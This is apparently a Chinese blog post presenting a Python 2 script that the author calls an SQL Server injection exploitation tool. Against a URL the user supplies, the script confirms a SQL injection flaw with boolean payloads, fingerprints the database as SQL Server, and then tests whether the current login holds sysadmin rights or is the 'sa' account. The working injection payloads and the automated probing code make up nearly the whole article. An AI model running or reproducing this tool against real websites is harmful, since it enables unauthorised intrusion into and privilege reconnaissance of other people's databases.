Python编写检测数据库SA用户的方法
admin
2023-07-31 02:05:57
0

本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:

# Code by zhaoxiaobu Email: little.bu@hotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1=\"%20and%201=2\" 
  sql2=\"%20and%201=1\" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print \"[信息]恭喜!这个URL是有注入漏洞的!n\" 
  print \"[信息]现在判断数据库是否是SQL Server,请耐心等候.....\"  
  is_SQLServer() 
  else: 
  print \"[错误]你确定这个URL能用?换个别的试试吧!n\"

def is_SQLServer(): 
  sql = \"%20and%20exists%20(select%20*%20from%20sysobjects)\" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print \"[错误]数据库好像不是SQL Server的!n\" 
  else: 
  print \"[信息]确认是SQL Server数据库!n\" 
  print \"[信息]开始检测当前数据库用户权限,请耐心等待......\" 
  is_sysadmin() 
 
 
def is_sysadmin():  
  sql = \"%20and%201=(select%20IS_SRVROLEMEMBER(\'sysadmin\'))\" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print \"[错误]当前数据库用户不具有sysadmin权限!n\" 
  else:  
    print \"[信息]当前数据库用户具有sysadmin权限!n\" 
    print \"[信息]检测当前用户是不是SA,请耐心等待......\" 
    is_sa()  
 
def is_sa():  
  sql = \"%20and%20\'sa\'=(select%20System_user)\"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print \"[错误]当前数据库用户不是SA!n\" 
  else:  
    print \"[信息]当前数据库用户是SA!n\" 
 
print \"n########################################################################n\"  
print \"            ^o^SQL Server注入利用工具^o^     \"  
print \"           Email: little.bu@hotmail.comn\"  
print \"========================================================================\";  
url = raw_input(\'[信息]请输入一个可能有注入漏洞的链接!nURL:\')  
if url == \'\':  
  print \"[错误]提供的URL必须具有 \'.asp?xxx=\' 这样的格式\"  
  exit(1)  
 
judge = raw_input(\"[信息]请提供一个判断字符串.n判断字符串:\")  
if judge == \'\':  
  print \"[错误]判断字符串不能为空!\"  
  exit(1)  
 
is_sqlable()
python 数据库 方法 SA用户 检测

上一篇:Python文件操作类操作实例详解

下一篇:python实现的生成随机迷宫算法核心代码分享(含游戏完整代码)

相关内容

热门资讯

500 行 Python 代码... 语法分析器描述了一个句子的语法结构,用来帮助其他的应用进行推理。自然语言引入了很多意外的歧义,以我们...
定时清理删除C:\Progra... C:\Program Files (x86)下面很多scoped_dir开头的文件夹 写个批处理 定...
65536是2的几次方 计算2... 65536是2的16次方:65536=2⁶ 65536是256的2次方:65536=256 6553...
Mobi、epub格式电子书如... 在wps里全局设置里有一个文件关联,打开,勾选电子书文件选项就可以了。
scoped_dir32_70... 一台虚拟机C盘总是莫名奇妙的空间用完,导致很多软件没法再运行。经过仔细检查发现是C:\Program...
pycparser 是一个用... `pycparser` 是一个用 Python 编写的 C 语言解析器。它可以用来解析 C 代码并构...
小程序支付时提示:appid和... [Q]小程序支付时提示:appid和mch_id不匹配 [A]小程序和微信支付没有进行关联,访问“小...
微信小程序使用slider实现... 众所周知哈,微信小程序里面的音频播放是没有进度条的,但最近有个项目呢,客户要求音频要有进度条控制,所...
python绘图库Matplo... 本文简单介绍了Python绘图库Matplotlib的安装,简介如下: matplotlib是pyt...
Prometheus+Graf... 一,Prometheus概述 1,什么是Prometheus?Prometheus是最初在Sound...